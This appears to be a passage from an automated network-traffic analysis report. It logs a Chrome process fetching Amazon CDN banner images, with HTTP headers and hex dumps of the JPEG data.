                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: a2 bf fa 75 36 0b 5f 29 1e bf 62 4f 03 b5 15 1c 88 e6 ae f6 bb c5 17 e9 64 96 1c b1 a4 11 2f 9e 5f 13 fd e0 70 a3 59 dd 6a 4d 65 98 47 38 0e b9 72 ac 4c ce 96 0d 16 49 3a aa bb 88 90 18 d0 3c 6d 31 2d 90 c9 f3 93 a3 48 9f 89 19 71 db 11 60 fa 3f 84 e4 76 70 63 83 1d a8 1b 4b 24 a9 a3 fa f9 94 e9 6d 51 71 d0 d2 b3 29 ab 94 f5 34 4a dd 29 d7 49 39 26 b2 4b cb f3 fb 78 74 75 29 49 32 24 46 59 6a 24 5b 0c 73 5b 31 4c 66 86 5e 45 1f 3d b7 b0 97 55 90 e2 9e 54 b7 31 30 bc 6f 0a c6 b0 d7 dc e5 f0 21 86 14 7b 2c 1f 2d 6d 0c 2b 02 5f ce 3d e5 7c e9 09 2a 65 cd 96 79 2a bb 9a f8 d4 43 a7 a5 92 d4 68 32 3a 03 e4 13 f2 4a 89 d1 72 ef 9c 50 cb 24 0b 30 7e 83 1b b0 e6 0d 60 95 7c f1 78 83 e9 48 3b 23 04 87 27 b0 24 de bb 49 3b e5 1c b2 09 ed 95 77 af de 2d 6c 6e 6b f5
                                                                                                                                                                                                        Data Ascii: u6_)bOd/_pYjMeG8rLI:<m1-Hq`?vpcK$mQq)4J)I9&Kxtu)I2$FYj$[s[1Lf^E=UT10o!{,-m+_=|*ey*Ch2:JrP$0~`|xH;#'$I;w-lnk
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: a9 e6 1f 17 24 cd cd b2 68 9f 65 77 2f a7 df e6 08 3a cb 9d 43 80 08 49 60 f7 47 de af 14 a8 3a fd 96 43 6c 86 11 52 df 9c cd c0 25 6f 94 3d d0 4a 02 5a c6 04 a8 bb ff 00 18 8f 6f 90 56 e5 39 94 fc 9c 45 6d 5c db 07 05 02 dc a6 cf 4f b2 44 31 20 91 8b 6b 11 a8 ea e9 75 73 ea 3b ac 49 d6 72 b8 63 d7 b7 8d 91 28 b3 aa 00 e4 e3 9b 2e 72 8e bc 11 8a 34 7e 54 9c 98 16 d3 4b e7 82 14 45 27 26 56 1d 97 4a a5 ad 95 4f 65 5e 2e a8 00 3b aa a2 7c e4 c7 e6 db 5c 65 2a 93 6d 6a 51 05 8c d7 e3 99 26 51 26 b8 72 ae 81 5c c9 72 77 28 2b a3 62 b9 0c 04 34 ab 93 96 41 39 85 41 1a 3c 83 54 d9 f3 5e ab cd 84 57 36 5a 02 03 27 dc e3 33 02 a9 ce 83 30 04 09 3d 10 48 a1 28 8c df 68 4e 47 26 cc 72 11 8d 7b 7c 5a f4 45 6e d7 86 e4 d6 49 5f 79 13 81 3d 20 95 5e 72 8d 02 ab e6 22
                                                                                                                                                                                                        Data Ascii: $hew/:CI`G:ClR%o=JZoV9Em\OD1 kus;Irc(.r4~TKE'&VJOe^.;|\e*mjQ&Q&r\rw(+b4A9A<T^W6Z'30=H(hNG&r{|ZEnI_y= ^r"
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: db 97 ce 59 87 d0 1c 9b 7a a4 4b da f3 b7 dc b3 74 3f 50 a2 a7 10 e1 45 b2 dd ea da 76 9c ea 18 98 d5 26 1d 35 af 1a 6e 29 64 52 5c 57 aa ba 7d 24 c8 4f 67 e7 41 c8 ae 60 39 16 bf 21 9b 11 fb 3f 90 51 1a c5 d2 c8 73 11 15 c7 2e 3f 8b 5d e5 3b bb 45 2c 8b 21 aa 89 93 8b 0f 4c ec ac a1 4c 52 d9 8e 03 eb 9c 40 89 b3 2a 26 51 de cd a6 b2 8b d1 4f ab 7f 2a 48 30 00 ba 3e 23 52 89 bf 79 b9 c5 55 dd cf 17 17 1e f4 de dd ed 25 64 13 f8 1a 18 0c 9b 44 a4 aa 81 23 aa 87 58 08 b2 3d 5c fd c9 fb b5 fe f5 95 1a 76 45 98 12 90 31 83 2a 07 29 02 e1 cc aa bf c7 23 b2 8e 35 c2 a4 02 89 ca 90 33 a9 bd d0 cb 63 12 37 4f 4f 5a 26 c3 03 20 4b e5 d9 54 11 a1 e5 31 a7 0a b9 c7 9d c4 0b 27 71 78 b8 65 de ab a9 21 c3 16 b4 4d af 65 98 d8 d5 93 36 2a eb 45 be 7b 9d 60 50 a4 45 05
                                                                                                                                                                                                        Data Ascii: YzKt?PEv&5n)dR\W}$OgA`9!?Qs.?];E,!LLR@*&QO*H0>#RyU%dD#X=\vE1*)#53c7OOZ& KT1'qxe!Me6*E{`PE
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: af 1c 3b 5b f4 23 60 18 82 6c 68 f7 92 50 ec e6 39 ac 1c 86 f3 86 d6 16 54 89 1c 09 20 ef 3a 0b c0 7b 63 74 f8 18 b1 e8 99 05 e4 b6 3a 67 d7 23 e1 61 37 09 1d d7 51 b1 98 42 74 5b 29 a0 33 2c 2f 41 7d 5d 5f 32 d6 ea e0 71 01 2c ed e7 d5 36 db 15 ae 93 6a de 95 2c 80 f6 9c 30 95 33 bc d2 d8 31 07 0a 28 61 bc 60 10 49 3f 19 c0 ae 73 19 5c 19 15 fc 81 42 03 4a a8 39 98 56 21 82 c7 65 d9 ea 9b 61 1d a5 00 d5 98 f6 5f 1a ec f5 03 85 1d c2 03 e5 85 8c f4 95 49 be ca 17 f1 1b b5 eb 78 6d 65 7f 7f 0a fa 4d 64 9b 22 2e 01 6c 08 ae e0 35 bb 81 09 5f 84 e2 32 6c 9d 4e 10 71 c7 0c 87 b6 44 99 ab bb 8d c8 df 73 95 13 66 a7 a9 3d cd f5 ec 46 2c f9 69 1b fe 1c 7e 32 7d 1e 7c 2e 66 6d 91 30 90 ba a8 73 02 2e 70 32 5c 46 4c 79 62 bd ad 2a cd ab 72 6e 28 d1 15 cb b9 a9 c4
                                                                                                                                                                                                        Data Ascii: ;[#`lhP9T :{ct:g#a7QBt[)3,/A}]_2q,6j,031(a`I?s\BJ9V!ea_IxmeMd".l5_2lNqDsf=F,i~2}|.fm0s.p2\FLyb*rn(
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1378INData Raw: 28 b5 47 59 e3 0e 6a f1 35 d1 cf b9 62 ff 00 35 8d ff 00 e1 9b 12 e6 9c 26 e9 8d 6b 18 52 3f 70 8a 8a 9b d3 c5 17 d4 bf 28 d8 e2 91 83 62 6f 79 15 11 a9 18 0d 8d 1c 31 d9 ea 13 51 3e 86 4b 0f 95 25 b2 da 9e 64 9f 6f e8 64 57 01 c7 e8 ed 6e 8f e2 3a d0 bc bc 1a 0b 48 f9 91 f2 6c b2 cd bc f3 5d 91 d1 da fd 2e 2b f0 9d 4d c8 b0 89 0f dd 1a 7a bd 91 36 d4 bf e8 16 55 fe 4c 9b 69 d6 a9 fc c0 81 61 07 b1 77 6e b8 c8 5e 6e 19 ad bf 3b b2 5a dc 7b e6 cf 6f ee 1c ef c6 fc a1 bf a1 75 9f ea 81 db 46 3f ab 5c 6f ff 00 33 6d 60 88 29 7a 77 90 f3 13 c6 3b 42 50 bb c9 f2 51 4d 86 cf 8e 45 de c8 73 ca 80 f9 7c a2 bf a4 54 3f e4 97 e4 eb 9f a6 9a c3 61 3e e0 0f ed f2 8f 29 ea 4b ad 5e d3 a5 a9 96 3e f5 d7 75 a1 23 12 27 93 89 1c 96 19 48 bf 31 e1 8c e7 26 da e9 9a d9 55
                                                                                                                                                                                                        Data Ascii: (GYj5b5&kR?p(boy1Q>K%dodWn:Hl].+Mz6ULiawn^n;Z{ouF?\o3m`)zw;BPQMEs|T?a>)K^>u#'H1&U


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        92192.168.2.44987518.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC471OUTGET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332324_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC961INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 5427
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 6b6683d4-bf61-4162-a36f-2130e3d67546
                                                                                                                                                                                                        Date: Fri, 02 Aug 2024 05:15:09 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 08 Aug 2023 07:14:49 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-791,/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332324_186x116_1X_en_AE
                                                                                                                                                                                                        Expires: Thu, 28 Jul 2044 05:15:09 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-791 /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332324_186x116_1X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 459ec09472abb8544521a9b5cc6706ce.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 200085
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: sxlHEJc9mNPY2W6WYjbA1Z_P8J63M4BL_agkV1y9qiOISSvFbZIBOw==
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC5427INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 39 00 01 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 07 09 06 08 03 0a 01 04 05 02 01 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 06 07 05 08 01 03 09 04 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b2 01 ec c6 9b 80 00 00 03
                                                                                                                                                                                                        Data Ascii: JFIFt"9


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        93192.168.2.44987218.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC450OUTGET /images/G/39/AE-hq/2023/img/Events/XCM_Manual_1537854_5334346_372x232_2X._SY116_CB613596448_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC898INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 4072
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 97e76142-7647-430a-919f-53de6c9d19da
                                                                                                                                                                                                        Date: Mon, 12 Aug 2024 07:16:58 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Feb 2023 11:45:15 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-616,/images/G/39/AE-hq/2023/img/Events/XCM_Manual_1537854_5334346_372x232_2X
                                                                                                                                                                                                        Expires: Sun, 07 Aug 2044 07:16:58 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-616 /images/G/39/AE-hq/2023/img/Events/XCM_Manual_1537854_5334346_372x232_2X
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Via: 1.1 87e83cc6e8f384d40eab78133e901302.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 282067
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: Abp3NevQGKkp-cmfEjy4eAomP5tbGjbNCXFkv76SYHi1ySRkGzi7VQ==
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC4072INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 a6 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 01 04 05 03 02 08 10 00 02 01 03 03 01 05 03 06 09 0b 05 00 00 00 00 01 02 03 00 04 11 05 12 21 31 06 13 22 51 61 32 41 71 07 14 16 53 91 a1 23 33 42 54 81 92 b1 c1 d1 15 24
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"Qa2AqS#3BT$


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        94192.168.2.44987118.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC463OUTGET /images/G/39/Associates/XCM_Manual_Top_deals_DQC_a70c6d45-b37b-4159-bdbe-6ce627caa9a7._SY116_CB613590867_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC1117INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3937
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: a93dca51-a0d4-41ad-ab27-a07d37faf1c2
                                                                                                                                                                                                        Date: Tue, 13 Aug 2024 06:56:18 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Feb 2023 12:27:45 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-382,/images/G/39/Associates/XCM_Manual_Top_deals_DQC_a70c6d45-b37b-4159-bdbe-6ce627caa9a7
                                                                                                                                                                                                        Expires: Mon, 08 Aug 2044 06:56:18 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-382 /images/G/39/Associates/XCM_Manual_Top_deals_DQC_a70c6d45-b37b-4159-bdbe-6ce627caa9a7
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 f75afc04e5fb2b66fe286e4f840886c6.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 130813
                                                                                                                                                                                                        Server-Timing: cdn-cache-hit,cdn-pop;desc="AMS58-P5",cdn-rid;desc="4WxVgjHCoTveJr_80eVCZOB1KDcamvmeICKdgFJuLniSyxchlBmM6A==",cdn-hit-layer;desc="Origin Shield",cdn-downstream-fbl;dur=103,provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: 4WxVgjHCoTveJr_80eVCZOB1KDcamvmeICKdgFJuLniSyxchlBmM6A==
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC3937INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9d 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 01 04 05 08 02 03 10 00 02 01 03 03 01 05 05 05 06 02 0b 00 00 00 00 01 02 03 00 04 11 05 12 21 31 06 13 41 51 71 07 22 61 62 91 14 32 42 a1 c1 15 23 52 81 b1 b2 82 f1 24 33
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQq"ab2B#R$3


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        95192.168.2.44987418.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC471OUTGET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332323_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC962INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 4521
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 4cf62dfe-5430-4546-975a-eeaf6e398b85
                                                                                                                                                                                                        Date: Sun, 14 Jul 2024 11:00:30 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 08 Aug 2023 07:14:49 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-599,/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332323_186x116_1X_en_AE
                                                                                                                                                                                                        Expires: Sat, 09 Jul 2044 11:00:30 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-599 /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332323_186x116_1X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 97f993f9d41d16f3f36b8c466857e2d6.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 2033549
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: o2SyMsOYRZRcUPbHi49rRToOyAbSsrptey6--tnOwvskJGyb5SFjjA==
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC4521INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 3a 00 01 00 00 06 03 01 01 00 00 00 00 00 00 00 00 00 00 03 06 07 08 09 0a 02 04 05 01 0b 01 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 07 08 05 06 01 04 09 02 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 c9 00 f6 62 9b 80 00 00
                                                                                                                                                                                                        Data Ascii: JFIFt":b


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        96192.168.2.44987318.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC471OUTGET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332322_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC962INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3859
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 746d34b8-922e-41fd-ba15-6238e7b036ce
                                                                                                                                                                                                        Date: Sun, 11 Aug 2024 06:15:06 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 08 Aug 2023 07:14:49 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-809,/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332322_186x116_1X_en_AE
                                                                                                                                                                                                        Expires: Sat, 06 Aug 2044 06:15:06 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-809 /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332322_186x116_1X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 97f993f9d41d16f3f36b8c466857e2d6.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 372180
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: 2IpaTMlYYbTVIrdDAGa-p3LxXOd71Afbf4J7Ofvqm7tHGUaYogPYTA==
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC3859INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 01 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 09 0a 07 08 02 05 06 04 03 01 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 06 07 08 05 09 01 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 92 01 ec c6 37 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIFt"67


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        97192.168.2.44987818.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC471OUTGET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
